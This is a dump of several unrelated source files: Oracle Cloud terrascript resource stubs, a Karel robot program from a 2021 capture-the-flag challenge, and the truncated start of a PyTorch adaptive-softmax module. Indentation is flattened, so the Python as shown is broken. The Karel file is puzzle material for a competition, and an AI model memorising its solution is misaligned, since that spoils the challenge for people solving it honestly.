class oci_autoscaling_auto_scaling_configuration(terrascript.Resource):
pass
class oci_bastion_bastion(terrascript.Resource):
pass
class oci_bastion_session(terrascript.Resource):
pass
class oci_bds_auto_scaling_configuration(terrascript.Resource):
pass
class oci_bds_bds_instance(terrascript.Resource):
pass
class oci_blockchain_blockchain_platform(terrascript.Resource):
pass
class oci_blockchain_osn(terrascript.Resource):
pass
class oci_blockchain_peer(terrascript.Resource):
pass
class oci_budget_alert_rule(terrascript.Resource):
pass
class oci_budget_budget(terrascript.Resource):
pass
class oci_cloud_guard_cloud_guard_configuration(terrascript.Resource):
pass
class oci_cloud_guard_data_mask_rule(terrascript.Resource):
pass
class oci_cloud_guard_detector_recipe(terrascript.Resource):
pass
class oci_cloud_guard_managed_list(terrascript.Resource):
pass
class oci_cloud_guard_responder_recipe(terrascript.Resource):
pass
class oci_cloud_guard_target(terrascript.Resource):
pass
class oci_containerengine_cluster(terrascript.Resource):
pass
class oci_containerengine_node_pool(terrascript.Resource):
pass
class oci_core_app_catalog_listing_resource_version_agreement(terrascript.Resource):
pass
class oci_core_app_catalog_subscription(terrascript.Resource):
pass
class oci_core_boot_volume(terrascript.Resource):
pass
class oci_core_boot_volume_backup(terrascript.Resource):
pass
class oci_core_cluster_network(terrascript.Resource):
pass
class oci_core_compute_capacity_reservation(terrascript.Resource):
pass
class oci_core_compute_image_capability_schema(terrascript.Resource):
pass
class oci_core_console_history(terrascript.Resource):
pass
class oci_core_cpe(terrascript.Resource):
pass
class oci_core_cross_connect(terrascript.Resource):
pass
class oci_core_cross_connect_group(terrascript.Resource):
pass
class oci_core_dedicated_vm_host(terrascript.Resource):
pass
class oci_core_default_dhcp_options(terrascript.Resource):
pass
class oci_core_default_route_table(terrascript.Resource):
pass
class oci_core_default_security_list(terrascript.Resource):
pass
class oci_core_dhcp_options(terrascript.Resource):
pass
class oci_core_drg(terrascript.Resource):
pass
class oci_core_drg_attachment(terrascript.Resource):
pass
class oci_core_drg_attachment_management(terrascript.Resource):
pass
class oci_core_drg_attachments_list(terrascript.Resource):
pass
class oci_core_drg_route_distribution(terrascript.Resource):
pass
class oci_core_drg_route_distribution_statement(terrascript.Resource):
pass
class oci_core_drg_route_table(terrascript.Resource):
pass
class oci_core_drg_route_table_route_rule(terrascript.Resource):
pass
class oci_core_image(terrascript.Resource):
pass
class oci_core_instance(terrascript.Resource):
pass
class oci_core_instance_configuration(terrascript.Resource):
pass
class oci_core_instance_console_connection(terrascript.Resource):
pass
class oci_core_instance_pool(terrascript.Resource):
pass
class oci_core_instance_pool_instance(terrascript.Resource):
pass
class oci_core_internet_gateway(terrascript.Resource):
pass
class oci_core_ipsec(terrascript.Resource):
pass
class oci_core_ipsec_connection_tunnel_management(terrascript.Resource):
pass
class oci_core_ipv6(terrascript.Resource):
pass
class oci_core_listing_resource_version_agreement(terrascript.Resource):
pass
class oci_core_local_peering_gateway(terrascript.Resource):
pass
class oci_core_nat_gateway(terrascript.Resource):
pass
class oci_core_network_security_group(terrascript.Resource):
pass
class oci_core_network_security_group_security_rule(terrascript.Resource):
pass
class oci_core_private_ip(terrascript.Resource):
pass
class oci_core_public_ip(terrascript.Resource):
pass
class oci_core_public_ip_pool(terrascript.Resource):
pass
class oci_core_public_ip_pool_capacity(terrascript.Resource):
pass
class oci_core_remote_peering_connection(terrascript.Resource):
pass
class oci_core_route_table(terrascript.Resource):
pass
class oci_core_route_table_attachment(terrascript.Resource):
pass
class oci_core_security_list(terrascript.Resource):
pass
class oci_core_service_gateway(terrascript.Resource):
pass
class oci_core_shape_management(terrascript.Resource):
pass
class oci_core_subnet(terrascript.Resource):
pass
class oci_core_vcn(terrascript.Resource):
pass
class oci_core_virtual_circuit(terrascript.Resource):
pass
class oci_core_virtual_network(terrascript.Resource):
pass
class oci_core_vlan(terrascript.Resource):
pass
class oci_core_vnic_attachment(terrascript.Resource):
pass
class oci_core_volume(terrascript.Resource):
pass
class oci_core_volume_attachment(terrascript.Resource):
pass
class oci_core_volume_backup(terrascript.Resource):
pass
class oci_core_volume_backup_policy(terrascript.Resource):
pass
class oci_core_volume_backup_policy_assignment(terrascript.Resource):
pass
class oci_core_volume_group(terrascript.Resource):
pass
class oci_core_volume_group_backup(terrascript.Resource):
pass
class oci_data_safe_data_safe_configuration(terrascript.Resource):
pass
class oci_data_safe_data_safe_private_endpoint(terrascript.Resource):
pass
class oci_data_safe_on_prem_connector(terrascript.Resource):
pass
class oci_data_safe_target_database(terrascript.Resource):
pass
class oci_database_autonomous_container_database(terrascript.Resource):
pass
class oci_database_autonomous_container_database_dataguard_association_operation(
terrascript.Resource
):
pass
class oci_database_autonomous_database(terrascript.Resource):
pass
class oci_database_autonomous_database_backup(terrascript.Resource):
pass
class oci_database_autonomous_database_instance_wallet_management(terrascript.Resource):
pass
class oci_database_autonomous_database_regional_wallet_management(terrascript.Resource):
pass
class oci_database_autonomous_database_wallet(terrascript.Resource):
pass
class oci_database_autonomous_exadata_infrastructure(terrascript.Resource):
pass
class oci_database_autonomous_vm_cluster(terrascript.Resource):
pass
class oci_database_backup(terrascript.Resource):
pass
class oci_database_backup_destination(terrascript.Resource):
pass
class oci_database_cloud_database_management(terrascript.Resource):
pass
class oci_database_cloud_exadata_infrastructure(terrascript.Resource):
pass
class oci_database_cloud_vm_cluster(terrascript.Resource):
pass
class oci_database_data_guard_association(terrascript.Resource):
pass
class oci_database_database(terrascript.Resource):
pass
class oci_database_database_software_image(terrascript.Resource):
pass
class oci_database_database_upgrade(terrascript.Resource):
pass
class oci_database_db_home(terrascript.Resource):
pass
class oci_database_db_node_console_connection(terrascript.Resource):
pass
class oci_database_db_system(terrascript.Resource):
pass
class oci_database_exadata_infrastructure(terrascript.Resource):
pass
class oci_database_exadata_infrastructure_storage(terrascript.Resource):
pass
class oci_database_exadata_iorm_config(terrascript.Resource):
pass
class oci_database_external_container_database(terrascript.Resource):
pass
class oci_database_external_container_database_management(terrascript.Resource):
pass
class oci_database_external_database_connector(terrascript.Resource):
pass
class oci_database_external_non_container_database(terrascript.Resource):
pass
class oci_database_external_non_container_database_management(terrascript.Resource):
pass
class oci_database_external_non_container_database_operations_insights_management(
terrascript.Resource
):
pass
class oci_database_external_pluggable_database(terrascript.Resource):
pass
class oci_database_external_pluggable_database_management(terrascript.Resource):
pass
class oci_database_external_pluggable_database_operations_insights_management(
terrascript.Resource
):
pass
class oci_database_key_store(terrascript.Resource):
pass
class oci_database_maintenance_run(terrascript.Resource):
pass
class oci_database_management_db_management_private_endpoint(terrascript.Resource):
pass
class oci_database_management_managed_database_group(terrascript.Resource):
pass
class oci_database_management_managed_databases_change_database_parameter(
terrascript.Resource
):
pass
class oci_database_management_managed_databases_reset_database_parameter(
terrascript.Resource
):
pass
class oci_database_migration(terrascript.Resource):
pass
class oci_database_migration_agent(terrascript.Resource):
pass
class oci_database_migration_connection(terrascript.Resource):
pass
class oci_database_migration_job(terrascript.Resource):
pass
class oci_database_migration_migration(terrascript.Resource):
pass
class oci_database_pluggable_database(terrascript.Resource):
pass
class oci_database_pluggable_databases_local_clone(terrascript.Resource):
pass
class oci_database_pluggable_databases_remote_clone(terrascript.Resource):
pass
class oci_database_vm_cluster(terrascript.Resource):
pass
class oci_database_vm_cluster_network(terrascript.Resource):
pass
class oci_datacatalog_catalog(terrascript.Resource):
pass
class oci_datacatalog_catalog_private_endpoint(terrascript.Resource):
pass
class oci_datacatalog_connection(terrascript.Resource):
pass
class oci_datacatalog_data_asset(terrascript.Resource):
pass
class oci_datacatalog_metastore(terrascript.Resource):
pass
class oci_dataflow_application(terrascript.Resource):
pass
class oci_dataflow_invoke_run(terrascript.Resource):
pass
class oci_dataflow_private_endpoint(terrascript.Resource):
pass
class oci_dataintegration_workspace(terrascript.Resource):
pass
class oci_datascience_job(terrascript.Resource):
pass
class oci_datascience_job_run(terrascript.Resource):
pass
class oci_datascience_model(terrascript.Resource):
pass
class oci_datascience_model_deployment(terrascript.Resource):
pass
class oci_datascience_model_provenance(terrascript.Resource):
pass
class oci_datascience_notebook_session(terrascript.Resource):
pass
class oci_datascience_project(terrascript.Resource):
pass
class oci_devops_deploy_artifact(terrascript.Resource):
pass
class oci_devops_deploy_environment(terrascript.Resource):
pass
class oci_devops_deploy_pipeline(terrascript.Resource):
pass
class oci_devops_deploy_stage(terrascript.Resource):
pass
class oci_devops_deployment(terrascript.Resource):
pass
class oci_devops_project(terrascript.Resource):
pass
class oci_dns_record(terrascript.Resource):
pass
class oci_dns_resolver(terrascript.Resource):
pass
class oci_dns_resolver_endpoint(terrascript.Resource):
pass
class oci_dns_rrset(terrascript.Resource):
pass
class oci_dns_steering_policy(terrascript.Resource):
pass
class oci_dns_steering_policy_attachment(terrascript.Resource):
pass
class oci_dns_tsig_key(terrascript.Resource):
pass
class oci_dns_view(terrascript.Resource):
pass
class oci_dns_zone(terrascript.Resource):
pass
class oci_email_dkim(terrascript.Resource):
pass
class oci_email_email_domain(terrascript.Resource):
pass
class oci_email_sender(terrascript.Resource):
pass
class oci_email_suppression(terrascript.Resource):
pass
class oci_events_rule(terrascript.Resource):
pass
class oci_file_storage_export(terrascript.Resource):
pass
class oci_file_storage_export_set(terrascript.Resource):
pass
class oci_file_storage_file_system(terrascript.Resource):
pass
class oci_file_storage_mount_target(terrascript.Resource):
pass
class oci_file_storage_snapshot(terrascript.Resource):
pass
class oci_functions_application(terrascript.Resource):
pass
class oci_functions_function(terrascript.Resource):
pass
class oci_functions_invoke_function(terrascript.Resource):
pass
class oci_generic_artifacts_content_artifact_by_path(terrascript.Resource):
pass
class oci_golden_gate_database_registration(terrascript.Resource):
pass
class oci_golden_gate_deployment(terrascript.Resource):
pass
class oci_golden_gate_deployment_backup(terrascript.Resource):
pass
class oci_health_checks_http_monitor(terrascript.Resource):
pass
class oci_health_checks_http_probe(terrascript.Resource):
pass
class oci_health_checks_ping_monitor(terrascript.Resource):
pass
class oci_health_checks_ping_probe(terrascript.Resource):
pass
class oci_identity_api_key(terrascript.Resource):
pass
class oci_identity_auth_token(terrascript.Resource):
pass
class oci_identity_authentication_policy(terrascript.Resource):
pass
class oci_identity_compartment(terrascript.Resource):
pass
class oci_identity_customer_secret_key(terrascript.Resource):
pass
class oci_identity_dynamic_group(terrascript.Resource):
pass
class oci_identity_group(terrascript.Resource):
pass
class oci_identity_identity_provider(terrascript.Resource):
pass
class oci_identity_idp_group_mapping(terrascript.Resource):
pass
class oci_identity_network_source(terrascript.Resource):
pass
class oci_identity_policy(terrascript.Resource):
pass
class oci_identity_smtp_credential(terrascript.Resource):
pass
class oci_identity_swift_password(terrascript.Resource):
pass
class oci_identity_tag(terrascript.Resource):
pass
class oci_identity_tag_default(terrascript.Resource):
pass
class oci_identity_tag_namespace(terrascript.Resource):
pass
class oci_identity_ui_password(terrascript.Resource):
pass
class oci_identity_user(terrascript.Resource):
pass
class oci_identity_user_capabilities_management(terrascript.Resource):
pass
class oci_identity_user_group_membership(terrascript.Resource):
pass
class oci_integration_integration_instance(terrascript.Resource):
pass
class oci_jms_fleet(terrascript.Resource):
pass
class oci_kms_encrypted_data(terrascript.Resource):
pass
class oci_kms_generated_key(terrascript.Resource):
pass
class oci_kms_key(terrascript.Resource):
pass
class oci_kms_key_version(terrascript.Resource):
pass
class oci_kms_sign(terrascript.Resource):
pass
class oci_kms_vault(terrascript.Resource):
pass
class oci_kms_vault_replication(terrascript.Resource):
pass
class oci_kms_verify(terrascript.Resource):
pass
class oci_limits_quota(terrascript.Resource):
pass
class oci_load_balancer(terrascript.Resource):
pass
class oci_load_balancer_backend(terrascript.Resource):
pass
class oci_load_balancer_backend_set(terrascript.Resource):
pass
class oci_load_balancer_backendset(terrascript.Resource):
pass
class oci_load_balancer_certificate(terrascript.Resource):
pass
class oci_load_balancer_hostname(terrascript.Resource):
pass
class oci_load_balancer_listener(terrascript.Resource):
pass
class oci_load_balancer_load_balancer(terrascript.Resource):
pass
class oci_load_balancer_load_balancer_routing_policy(terrascript.Resource):
pass
class oci_load_balancer_path_route_set(terrascript.Resource):
pass
class oci_load_balancer_rule_set(terrascript.Resource):
pass
class oci_load_balancer_ssl_cipher_suite(terrascript.Resource):
pass
class oci_log_analytics_log_analytics_entity(terrascript.Resource):
pass
class oci_log_analytics_log_analytics_import_custom_content(terrascript.Resource):
pass
class oci_log_analytics_log_analytics_log_group(terrascript.Resource):
pass
class oci_log_analytics_log_analytics_object_collection_rule(terrascript.Resource):
pass
class oci_log_analytics_namespace(terrascript.Resource):
pass
class oci_logging_log(terrascript.Resource):
pass
class oci_logging_log_group(terrascript.Resource):
pass
class oci_logging_log_saved_search(terrascript.Resource):
pass
class oci_logging_unified_agent_configuration(terrascript.Resource):
pass
class oci_management_agent_management_agent(terrascript.Resource):
pass
class oci_management_agent_management_agent_install_key(terrascript.Resource):
pass
class oci_management_dashboard_management_dashboards_import(terrascript.Resource):
pass
class oci_marketplace_accepted_agreement(terrascript.Resource):
pass
class oci_marketplace_listing_package_agreement(terrascript.Resource):
pass
class oci_marketplace_publication(terrascript.Resource):
pass
class oci_metering_computation_custom_table(terrascript.Resource):
pass
class oci_metering_computation_query(terrascript.Resource):
pass
class oci_metering_computation_usage(terrascript.Resource):
pass
class oci_monitoring_alarm(terrascript.Resource):
pass
class oci_mysql_analytics_cluster(terrascript.Resource):
pass
class oci_mysql_channel(terrascript.Resource):
pass
class oci_mysql_heat_wave_cluster(terrascript.Resource):
pass
class oci_mysql_mysql_backup(terrascript.Resource):
pass
class oci_mysql_mysql_db_system(terrascript.Resource):
pass
class oci_network_load_balancer_backend(terrascript.Resource):
pass
class oci_network_load_balancer_backend_set(terrascript.Resource):
pass
class oci_network_load_balancer_listener(terrascript.Resource):
pass
class oci_network_load_balancer_network_load_balancer(terrascript.Resource):
pass
class oci_nosql_index(terrascript.Resource):
pass
class oci_nosql_table(terrascript.Resource):
pass
class oci_objectstorage_bucket(terrascript.Resource):
pass
class oci_objectstorage_namespace_metadata(terrascript.Resource):
pass
class oci_objectstorage_object(terrascript.Resource):
pass
class oci_objectstorage_object_lifecycle_policy(terrascript.Resource):
pass
class oci_objectstorage_preauthrequest(terrascript.Resource):
pass
class oci_objectstorage_replication_policy(terrascript.Resource):
pass
class oci_oce_oce_instance(terrascript.Resource):
pass
class oci_ocvp_esxi_host(terrascript.Resource):
pass
class oci_ocvp_sddc(terrascript.Resource):
pass
class oci_oda_oda_instance(terrascript.Resource):
pass
class oci_ons_notification_topic(terrascript.Resource):
pass
class oci_ons_subscription(terrascript.Resource):
pass
class oci_opsi_database_insight(terrascript.Resource):
pass
class oci_opsi_enterprise_manager_bridge(terrascript.Resource):
pass
class oci_opsi_host_insight(terrascript.Resource):
pass
class oci_optimizer_enrollment_status(terrascript.Resource):
pass
class oci_optimizer_profile(terrascript.Resource):
pass
class oci_optimizer_recommendation(terrascript.Resource):
pass
class oci_optimizer_resource_action(terrascript.Resource):
pass
class oci_osmanagement_managed_instance(terrascript.Resource):
pass
class oci_osmanagement_managed_instance_group(terrascript.Resource):
pass
class oci_osmanagement_managed_instance_management(terrascript.Resource):
pass
class oci_osmanagement_software_source(terrascript.Resource):
pass
class oci_sch_service_connector(terrascript.Resource):
pass
class oci_service_catalog_private_application(terrascript.Resource):
pass
class oci_service_catalog_service_catalog(terrascript.Resource):
pass
class oci_service_catalog_service_catalog_association(terrascript.Resource):
pass
class oci_streaming_connect_harness(terrascript.Resource):
pass
class oci_streaming_stream(terrascript.Resource):
pass
class oci_streaming_stream_pool(terrascript.Resource):
pass
class oci_vulnerability_scanning_container_scan_recipe(terrascript.Resource):
pass
class oci_vulnerability_scanning_container_scan_target(terrascript.Resource):
pass
class oci_vulnerability_scanning_host_scan_recipe(terrascript.Resource):
pass
class oci_vulnerability_scanning_host_scan_target(terrascript.Resource):
pass
class oci_waas_address_list(terrascript.Resource):
pass
class oci_waas_certificate(terrascript.Resource):
pass
class oci_waas_custom_protection_rule(terrascript.Resource):
pass
class oci_waas_http_redirect(terrascript.Resource):
pass
class oci_waas_protection_rule(terrascript.Resource):
pass
class oci_waas_purge_cache(terrascript.Resource):
pass
class oci_waas_waas_policy(terrascript.Resource):
pass
__all__ = [
"oci_ai_anomaly_detection_ai_private_endpoint",
"oci_ai_anomaly_detection_data_asset",
"oci_ai_anomaly_detection_model",
"oci_ai_anomaly_detection_project",
"oci_analytics_analytics_instance",
"oci_analytics_analytics_instance_private_access_channel",
"oci_analytics_analytics_instance_vanity_url",
"oci_apigateway_api",
"oci_apigateway_certificate",
"oci_apigateway_deployment",
"oci_apigateway_gateway",
"oci_apm_apm_domain",
"oci_apm_synthetics_monitor",
"oci_apm_synthetics_script",
"oci_artifacts_container_configuration",
"oci_artifacts_container_image_signature",
"oci_artifacts_container_repository",
"oci_artifacts_generic_artifact",
"oci_artifacts_repository",
"oci_audit_configuration",
"oci_autoscaling_auto_scaling_configuration",
"oci_bastion_bastion",
"oci_bastion_session",
"oci_bds_auto_scaling_configuration",
"oci_bds_bds_instance",
"oci_blockchain_blockchain_platform",
"oci_blockchain_osn",
"oci_blockchain_peer",
"oci_budget_alert_rule",
"oci_budget_budget",
"oci_cloud_guard_cloud_guard_configuration",
"oci_cloud_guard_data_mask_rule",
"oci_cloud_guard_detector_recipe",
"oci_cloud_guard_managed_list",
"oci_cloud_guard_responder_recipe",
"oci_cloud_guard_target",
"oci_containerengine_cluster",
"oci_containerengine_node_pool",
"oci_core_app_catalog_listing_resource_version_agreement",
"oci_core_app_catalog_subscription",
"oci_core_boot_volume",
"oci_core_boot_volume_backup",
"oci_core_cluster_network",
"oci_core_compute_capacity_reservation",
"oci_core_compute_image_capability_schema",
"oci_core_console_history",
"oci_core_cpe",
"oci_core_cross_connect",
"oci_core_cross_connect_group",
"oci_core_dedicated_vm_host",
"oci_core_default_dhcp_options",
"oci_core_default_route_table",
"oci_core_default_security_list",
"oci_core_dhcp_options",
"oci_core_drg",
"oci_core_drg_attachment",
"oci_core_drg_attachment_management",
"oci_core_drg_attachments_list",
"oci_core_drg_route_distribution",
"oci_core_drg_route_distribution_statement",
"oci_core_drg_route_table",
"oci_core_drg_route_table_route_rule",
"oci_core_image",
"oci_core_instance",
"oci_core_instance_configuration",
"oci_core_instance_console_connection",
"oci_core_instance_pool",
"oci_core_instance_pool_instance",
"oci_core_internet_gateway",
"oci_core_ipsec",
"oci_core_ipsec_connection_tunnel_management",
"oci_core_ipv6",
"oci_core_listing_resource_version_agreement",
"oci_core_local_peering_gateway",
"oci_core_nat_gateway",
"oci_core_network_security_group",
"oci_core_network_security_group_security_rule",
"oci_core_private_ip",
"oci_core_public_ip",
"oci_core_public_ip_pool",
"oci_core_public_ip_pool_capacity",
"oci_core_remote_peering_connection",
"oci_core_route_table",
"oci_core_route_table_attachment",
"oci_core_security_list",
"oci_core_service_gateway",
"oci_core_shape_management",
"oci_core_subnet",
"oci_core_vcn",
"oci_core_virtual_circuit",
"oci_core_virtual_network",
"oci_core_vlan",
"oci_core_vnic_attachment",
"oci_core_volume",
"oci_core_volume_attachment",
"oci_core_volume_backup",
"oci_core_volume_backup_policy",
"oci_core_volume_backup_policy_assignment",
"oci_core_volume_group",
"oci_core_volume_group_backup",
"oci_data_safe_data_safe_configuration",
"oci_data_safe_data_safe_private_endpoint",
"oci_data_safe_on_prem_connector",
"oci_data_safe_target_database",
"oci_database_autonomous_container_database",
"oci_database_autonomous_container_database_dataguard_association_operation",
"oci_database_autonomous_database",
"oci_database_autonomous_database_backup",
"oci_database_autonomous_database_instance_wallet_management",
"oci_database_autonomous_database_regional_wallet_management",
"oci_database_autonomous_database_wallet",
"oci_database_autonomous_exadata_infrastructure",
"oci_database_autonomous_vm_cluster",
"oci_database_backup",
"oci_database_backup_destination",
"oci_database_cloud_database_management",
"oci_database_cloud_exadata_infrastructure",
"oci_database_cloud_vm_cluster",
"oci_database_data_guard_association",
"oci_database_database",
"oci_database_database_software_image",
"oci_database_database_upgrade",
"oci_database_db_home",
"oci_database_db_node_console_connection",
"oci_database_db_system",
"oci_database_exadata_infrastructure",
"oci_database_exadata_infrastructure_storage",
"oci_database_exadata_iorm_config",
"oci_database_external_container_database",
"oci_database_external_container_database_management",
"oci_database_external_database_connector",
"oci_database_external_non_container_database",
"oci_database_external_non_container_database_management",
"oci_database_external_non_container_database_operations_insights_management",
"oci_database_external_pluggable_database",
"oci_database_external_pluggable_database_management",
"oci_database_external_pluggable_database_operations_insights_management",
"oci_database_key_store",
"oci_database_maintenance_run",
"oci_database_management_db_management_private_endpoint",
"oci_database_management_managed_database_group",
"oci_database_management_managed_databases_change_database_parameter",
"oci_database_management_managed_databases_reset_database_parameter",
"oci_database_migration",
"oci_database_migration_agent",
"oci_database_migration_connection",
"oci_database_migration_job",
"oci_database_migration_migration",
"oci_database_pluggable_database",
"oci_database_pluggable_databases_local_clone",
"oci_database_pluggable_databases_remote_clone",
"oci_database_vm_cluster",
"oci_database_vm_cluster_network",
"oci_datacatalog_catalog",
"oci_datacatalog_catalog_private_endpoint",
"oci_datacatalog_connection",
"oci_datacatalog_data_asset",
"oci_datacatalog_metastore",
"oci_dataflow_application",
"oci_dataflow_invoke_run",
"oci_dataflow_private_endpoint",
"oci_dataintegration_workspace",
"oci_datascience_job",
"oci_datascience_job_run",
"oci_datascience_model",
"oci_datascience_model_deployment",
"oci_datascience_model_provenance",
"oci_datascience_notebook_session",
"oci_datascience_project",
"oci_devops_deploy_artifact",
"oci_devops_deploy_environment",
"oci_devops_deploy_pipeline",
"oci_devops_deploy_stage",
"oci_devops_deployment",
"oci_devops_project",
"oci_dns_record",
"oci_dns_resolver",
"oci_dns_resolver_endpoint",
"oci_dns_rrset",
"oci_dns_steering_policy",
"oci_dns_steering_policy_attachment",
"oci_dns_tsig_key",
"oci_dns_view",
"oci_dns_zone",
"oci_email_dkim",
"oci_email_email_domain",
"oci_email_sender",
"oci_email_suppression",
"oci_events_rule",
"oci_file_storage_export",
"oci_file_storage_export_set",
"oci_file_storage_file_system",
"oci_file_storage_mount_target",
"oci_file_storage_snapshot",
"oci_functions_application",
"oci_functions_function",
"oci_functions_invoke_function",
"oci_generic_artifacts_content_artifact_by_path",
"oci_golden_gate_database_registration",
"oci_golden_gate_deployment",
"oci_golden_gate_deployment_backup",
"oci_health_checks_http_monitor",
"oci_health_checks_http_probe",
"oci_health_checks_ping_monitor",
"oci_health_checks_ping_probe",
"oci_identity_api_key",
"oci_identity_auth_token",
"oci_identity_authentication_policy",
"oci_identity_compartment",
"oci_identity_customer_secret_key",
"oci_identity_dynamic_group",
"oci_identity_group",
"oci_identity_identity_provider",
"oci_identity_idp_group_mapping",
"oci_identity_network_source",
"oci_identity_policy",
"oci_identity_smtp_credential",
"oci_identity_swift_password",
"oci_identity_tag",
"oci_identity_tag_default",
"oci_identity_tag_namespace",
"oci_identity_ui_password",
"oci_identity_user",
"oci_identity_user_capabilities_management",
"oci_identity_user_group_membership",
"oci_integration_integration_instance",
"oci_jms_fleet",
"oci_kms_encrypted_data",
"oci_kms_generated_key",
"oci_kms_key",
"oci_kms_key_version",
"oci_kms_sign",
"oci_kms_vault",
"oci_kms_vault_replication",
"oci_kms_verify",
"oci_limits_quota",
"oci_load_balancer",
"oci_load_balancer_backend",
"oci_load_balancer_backend_set",
"oci_load_balancer_backendset",
"oci_load_balancer_certificate",
"oci_load_balancer_hostname",
"oci_load_balancer_listener",
"oci_load_balancer_load_balancer",
"oci_load_balancer_load_balancer_routing_policy",
"oci_load_balancer_path_route_set",
"oci_load_balancer_rule_set",
"oci_load_balancer_ssl_cipher_suite",
"oci_log_analytics_log_analytics_entity",
"oci_log_analytics_log_analytics_import_custom_content",
"oci_log_analytics_log_analytics_log_group",
"oci_log_analytics_log_analytics_object_collection_rule",
"oci_log_analytics_namespace",
"oci_logging_log",
"oci_logging_log_group",
"oci_logging_log_saved_search",
"oci_logging_unified_agent_configuration",
"oci_management_agent_management_agent",
"oci_management_agent_management_agent_install_key",
"oci_management_dashboard_management_dashboards_import",
"oci_marketplace_accepted_agreement",
"oci_marketplace_listing_package_agreement",
"oci_marketplace_publication",
"oci_metering_computation_custom_table",
"oci_metering_computation_query",
"oci_metering_computation_usage",
"oci_monitoring_alarm",
"oci_mysql_analytics_cluster",
"oci_mysql_channel",
"oci_mysql_heat_wave_cluster",
"oci_mysql_mysql_backup",
"oci_mysql_mysql_db_system",
"oci_network_load_balancer_backend",
"oci_network_load_balancer_backend_set",
"oci_network_load_balancer_listener",
"oci_network_load_balancer_network_load_balancer",
"oci_nosql_index",
"oci_nosql_table",
"oci_objectstorage_bucket",
"oci_objectstorage_namespace_metadata",
"oci_objectstorage_object",
"oci_objectstorage_object_lifecycle_policy",
"oci_objectstorage_preauthrequest",
"oci_objectstorage_replication_policy",
"oci_oce_oce_instance",
"oci_ocvp_esxi_host",
"oci_ocvp_sddc",
"oci_oda_oda_instance",
"oci_ons_notification_topic",
"oci_ons_subscription",
"oci_opsi_database_insight",
"oci_opsi_enterprise_manager_bridge",
"oci_opsi_host_insight",
"oci_optimizer_enrollment_status",
"oci_optimizer_profile",
"oci_optimizer_recommendation",
"oci_optimizer_resource_action",
"oci_osmanagement_managed_instance",
"oci_osmanagement_managed_instance_group",
"oci_osmanagement_managed_instance_management",
"oci_osmanagement_software_source",
"oci_sch_service_connector",
"oci_service_catalog_private_application",
"oci_service_catalog_service_catalog",
"oci_service_catalog_service_catalog_association",
"oci_streaming_connect_harness",
"oci_streaming_stream",
"oci_streaming_stream_pool",
"oci_vulnerability_scanning_container_scan_recipe",
"oci_vulnerability_scanning_container_scan_target",
"oci_vulnerability_scanning_host_scan_recipe",
"oci_vulnerability_scanning_host_scan_target",
"oci_waas_address_list",
"oci_waas_certificate",
"oci_waas_custom_protection_rule",
"oci_waas_http_redirect",
"oci_waas_protection_rule",
"oci_waas_purge_cache",
"oci_waas_waas_policy",
]
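Each stub above contributes only its class name; the terrascript `Resource` base class (as used here) derives the Terraform resource type from that name, takes a label as the first argument, and records keyword arguments as the resource body. A minimal stand-in sketch of that pattern (hypothetical re-implementation, not the real terrascript API):

```python
# Hypothetical minimal stand-in for terrascript.Resource: the subclass name
# becomes the Terraform resource type, the first argument its label, and
# keyword arguments its body.
class Resource:
    def __init__(self, label, **kwargs):
        self.type = type(self).__name__
        self.label = label
        self.values = kwargs

class oci_core_vcn(Resource):
    pass

vcn = oci_core_vcn("main", cidr_block="10.0.0.0/16", display_name="main-vcn")
print(vcn.type, vcn.label)  # oci_core_vcn main
```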

# challenges/misc/karel/source/challenge.py (infosec-ucalgary/magpieCTF-2021, MIT)
from karel import *
begin_karel_program()
turn_left()
pick_beeper()
put_beeper()
turn_left()
turn_left()
pick_beeper()
move()
turn_left()
turn_left()
pick_beeper()
turn_left()
put_beeper()
turn_left()
put_beeper()
move()
move()
turn_left()
pick_beeper()
pick_beeper()
turn_left()
turn_left()
pick_beeper()
turn_left()
turn_left()
turn_left()
put_beeper()
pick_beeper()
pick_beeper()
turn_left()
move()
pick_beeper()
put_beeper()
move()
put_beeper()
turn_left()
move()
turn_left()
put_beeper()
move()
pick_beeper()
move()
put_beeper()
move()
put_beeper()
move()
put_beeper()
move()
turn_left()
turn_left()
turn_left()
put_beeper()
put_beeper()
move()
put_beeper()
move()
turn_left()
move()
put_beeper()
turn_left()
turn_left()
turn_left()
turn_left()
put_beeper()
put_beeper()
move()
put_beeper()
turn_left()
move()
turn_left()
turn_left()
put_beeper()
put_beeper()
move()
put_beeper()
turn_left()
pick_beeper()
turn_left()
put_beeper()
move()
pick_beeper()
move()
put_beeper()
move()
put_beeper()
move()
put_beeper()
turn_left()
move()
move()
put_beeper()
turn_left()
put_beeper()
turn_left()
turn_left()
put_beeper()
put_beeper()
move()
put_beeper()
turn_left()
put_beeper()
move()
put_beeper()
move()
put_beeper()
move()
put_beeper()
turn_left()
move()
turn_left()
move()
move()
put_beeper()
turn_left()
move()
pick_beeper()
move()
move()
put_beeper()
move()
put_beeper()
turn_left()
put_beeper()
move()
pick_beeper()
end_karel_program()
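The script above is a straight-line sequence of Karel commands with no control flow. A hypothetical minimal stand-in for the imported karel API (function names assumed from the calls above) that simply records the command trace, replayed on a short sequence:

```python
# Hypothetical recorder for the karel API used above; the real module
# (from karel import *) presumably simulates Karel's world instead.
trace = []

def begin_karel_program():
    trace.append("begin")

def end_karel_program():
    trace.append("end")

def move():
    trace.append("move")

def turn_left():
    trace.append("turn_left")

def pick_beeper():
    trace.append("pick")

def put_beeper():
    trace.append("put")

# Replay a short prefix of the challenge's command sequence.
begin_karel_program()
turn_left()
pick_beeper()
put_beeper()
end_karel_program()
print(trace)  # ['begin', 'turn_left', 'pick', 'put', 'end']
```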

# lib/analyzers/__init__.py (bertid/clean-pvnet, Apache-2.0)
from .make_analyzer import make_analyzer

# src/utils/proj_adaptive_softmax.py (richardbaihe/robustLM, MIT)
from collections import defaultdict
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
# torch.version.cuda is None on CPU-only builds; fall back to "0.0" so the
# module still imports.
_cuda_version = torch.version.cuda or "0.0"
CUDA_MAJOR = int(_cuda_version.split(".")[0])
CUDA_MINOR = int(_cuda_version.split(".")[1])
class ProjectedAdaptiveLogSoftmax(nn.Module):
def __init__(self, n_token, d_embed, d_proj, cutoffs, div_val=1, keep_order=False):
super(ProjectedAdaptiveLogSoftmax, self).__init__()
self.n_token = n_token
self.d_embed = d_embed
self.d_proj = d_proj
self.cutoffs = cutoffs + [n_token]
self.cutoff_ends = [0] + self.cutoffs
self.div_val = div_val
self.shortlist_size = self.cutoffs[0]
self.n_clusters = len(self.cutoffs) - 1
self.head_size = self.shortlist_size + self.n_clusters
if self.n_clusters > 0:
self.cluster_weight = nn.Parameter(
